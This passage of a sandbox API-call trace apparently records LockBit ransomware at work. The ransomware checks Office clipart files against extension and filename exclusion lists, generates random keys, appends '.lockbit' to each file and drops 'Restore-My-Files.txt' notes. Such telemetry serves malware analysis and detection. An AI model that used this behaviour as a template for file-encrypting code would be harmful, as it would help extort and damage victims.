lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0124.228] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0124.228] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0124.228] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0124.229] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0124.229] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0124.229] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0124.229] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0124.229] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0124.229] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0124.230] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0124.230] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0124.230] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0124.230] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0124.230] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.230] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0124.230] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0124.230] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0124.230] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0124.230] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099192.GIF") returned 1 [0124.230] lstrcmpiW (lpString1="ntldr", lpString2="J0099192.GIF") returned 1 [0124.230] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099192.GIF") returned 1 [0124.230] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099192.GIF") returned -1 [0124.230] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099192.GIF") returned -1 [0124.230] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099192.GIF") returned 1 [0124.230] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099192.GIF") returned -1 [0124.230] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.230] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned=".GIF" [0124.230] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0124.230] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0124.230] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0124.231] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0124.231] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0124.231] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0124.231] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0124.231] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0124.231] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0124.231] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0124.231] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0124.231] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0124.231] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0124.231] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0124.231] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0124.231] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0124.231] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0124.231] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0124.231] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0124.231] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0124.231] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0124.231] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0124.231] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0124.232] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0124.232] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0124.232] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0124.232] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0124.232] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0124.232] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF.lockbit") returned 72 [0124.232] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099192.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0124.232] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.232] malloc (_Size=0x40068) returned 0x3e70008 [0124.233] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=17964) returned 1 [0124.233] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.233] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0124.233] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.233] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0124.233] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0124.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.238] malloc (_Size=0xa6) returned 0x77d7a8 [0124.238] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.239] free (_Block=0x77d7a8) [0124.239] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.239] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.239] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.239] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65dd0810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x8ada, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099193.GIF", cAlternateFileName="")) returned 1 [0124.239] lstrcmpiW (lpString1=".", lpString2="J0099193.GIF") returned -1 [0124.239] lstrcmpiW (lpString1="..", lpString2="J0099193.GIF") returned -1 [0124.239] PathFindExtensionW (pszPath="J0099193.GIF") returned=".GIF" [0124.239] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0124.239] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0124.239] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0124.239] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0124.240] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0124.240] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0124.240] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0124.240] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0124.240] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0124.240] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0124.240] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0124.240] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0124.240] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0124.240] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0124.240] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0124.241] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099193.GIF") returned 1 [0124.241] lstrcmpiW (lpString1="ntldr", lpString2="J0099193.GIF") returned 1 [0124.241] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099193.GIF") returned 1 [0124.241] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099193.GIF") returned -1 [0124.241] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099193.GIF") returned -1 [0124.241] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099193.GIF") returned 1 [0124.241] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099193.GIF") returned -1 [0124.241] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.241] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned=".GIF" [0124.241] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0124.241] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0124.242] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0124.242] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0124.242] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0124.242] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0124.242] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0124.242] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0124.242] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0124.242] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0124.242] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0124.242] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0124.242] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0124.242] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0124.242] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0124.242] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0124.242] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0124.242] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0124.242] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0124.242] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0124.242] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0124.242] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0124.242] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0124.242] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0124.242] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0124.242] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0124.242] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0124.242] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF.lockbit") returned 72 [0124.242] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099193.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0124.243] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.243] malloc (_Size=0x40068) returned 0x3df0008 [0124.243] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=35546) returned 1 [0124.243] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.243] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0124.243] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0124.244] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.248] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.248] malloc (_Size=0xa6) returned 0x77d7a8 [0124.248] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.257] free (_Block=0x77d7a8) [0124.257] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.257] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.257] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.257] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x62b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099194.GIF", cAlternateFileName="")) returned 1 [0124.257] lstrcmpiW (lpString1=".", lpString2="J0099194.GIF") returned -1 [0124.257] lstrcmpiW (lpString1="..", lpString2="J0099194.GIF") returned -1 [0124.257] PathFindExtensionW (pszPath="J0099194.GIF") returned=".GIF" [0124.257] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0124.257] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0124.258] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0124.258] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0124.258] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0124.258] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0124.258] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0124.258] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0124.258] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0124.258] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0124.258] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0124.258] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0124.258] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0124.258] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0124.258] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0124.259] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099194.GIF") returned 1 [0124.259] lstrcmpiW (lpString1="ntldr", lpString2="J0099194.GIF") returned 1 [0124.259] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099194.GIF") returned 1 [0124.259] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099194.GIF") returned -1 [0124.259] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099194.GIF") returned -1 [0124.259] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099194.GIF") returned 1 [0124.259] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099194.GIF") returned -1 [0124.259] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.259] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned=".GIF" [0124.259] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0124.259] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0124.259] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0124.259] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0124.260] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0124.260] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0124.260] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0124.260] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0124.260] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0124.260] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0124.260] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0124.260] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0124.260] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0124.260] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0124.260] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0124.260] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0124.260] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0124.260] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0124.260] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0124.260] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0124.260] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0124.260] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0124.260] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0124.260] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0124.260] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0124.261] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0124.261] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0124.261] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF.lockbit") returned 72 [0124.261] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099194.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0124.261] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.261] malloc (_Size=0x40068) returned 0x1ff1e60 [0124.261] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=25265) returned 1 [0124.261] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.262] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.262] 